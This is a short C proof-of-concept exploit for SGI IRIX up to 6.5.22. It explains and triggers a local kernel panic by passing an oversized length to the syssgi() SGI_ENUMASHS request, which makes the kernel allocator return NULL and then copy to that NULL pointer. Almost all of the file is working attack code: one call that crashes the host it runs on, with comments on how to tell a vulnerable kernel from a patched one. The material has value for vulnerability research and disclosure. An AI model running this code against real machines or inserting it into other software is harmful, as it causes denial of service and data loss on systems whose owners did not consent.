/* SGI IRIX <= 6.5.22 syssgi() SGI_ENUMASHS kernel panic
* =====================================================
 * SGI implemented their own BSD-style system call "syssgi" for
 * debugging and diagnostics of IRIX. A vulnerability exists
 * in the handling of the SGI_ENUMASHS request when it is given
 * a large length argument: the system call passes the caller-
 * supplied length directly to kern_calloc() without checking it.
 * Supplying an oversized length causes the kernel heap allocator
 * to fail and return NULL; that NULL is then handed to copyout(),
 * whose read of the NULL page panics the kernel, i.e. a local
 * denial-of-service condition.
 *
 * Caveat: a successful run panics the kernel of the machine the
 * program is executed on. Run it only on a disposable test system.
*
* -- HackerFantastic
* (https://hacker.house)
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/syssgi.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
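/* Issue the SGI_ENUMASHS request with an oversized length argument.
 *
 * Allocates a user buffer of bufsize bytes and passes it, together with
 * that length, to syssgi(SGI_ENUMASHS). On a vulnerable kernel the call
 * does not return (the machine panics). If it does return, the result
 * and errno are reported so a kernel that now rejects the length (error
 * return) can be told apart from an unexpected success.
 *
 * Returns 0 when syssgi() returned, 1 when the user buffer could not be
 * allocated. Command-line arguments are not used.
 */
int main(int argc, char *argv[])
{
    /* 67107840 (0x3FFF000) is the length the PoC hands to the kernel; per
     * the header comment it is large enough to make kern_calloc() fail.
     * Kept as unsigned int, the type the original PoC passed: do not widen
     * it without checking the syssgi() prototype, since the argument width
     * is what the kernel reads. */
    unsigned int bufsize = 67107840;
    char *output_buffer;
    ssize_t out;

    (void)argc;
    (void)argv;

    printf("[ IRIX <= 6.5.22 syssgi() SGI_ENUMASHS kernel panic!\n");

    /* The user-side buffer only has to be a valid, non-NULL destination;
     * nothing is expected to be written into it before the panic. */
    output_buffer = malloc(bufsize);
    if (!output_buffer) {
        /* Exit non-zero so a failed setup is not mistaken for "survived". */
        fprintf(stderr, "malloc() failure\n");
        return 1;
    }

    out = syssgi(SGI_ENUMASHS, output_buffer, bufsize);

    /* Reaching this line means the kernel survived the call. Report how it
     * survived instead of discarding the result: an error return suggests
     * the kernel now validates the length; a non-error return is worth a
     * closer look. */
    if (out == -1) {
        perror("syssgi(SGI_ENUMASHS)");
    } else {
        printf("syssgi() returned %ld\n", (long)out);
    }
    printf("process survived kernel_calloc() - not vulnerable?\n");

    free(output_buffer);
    return 0;
}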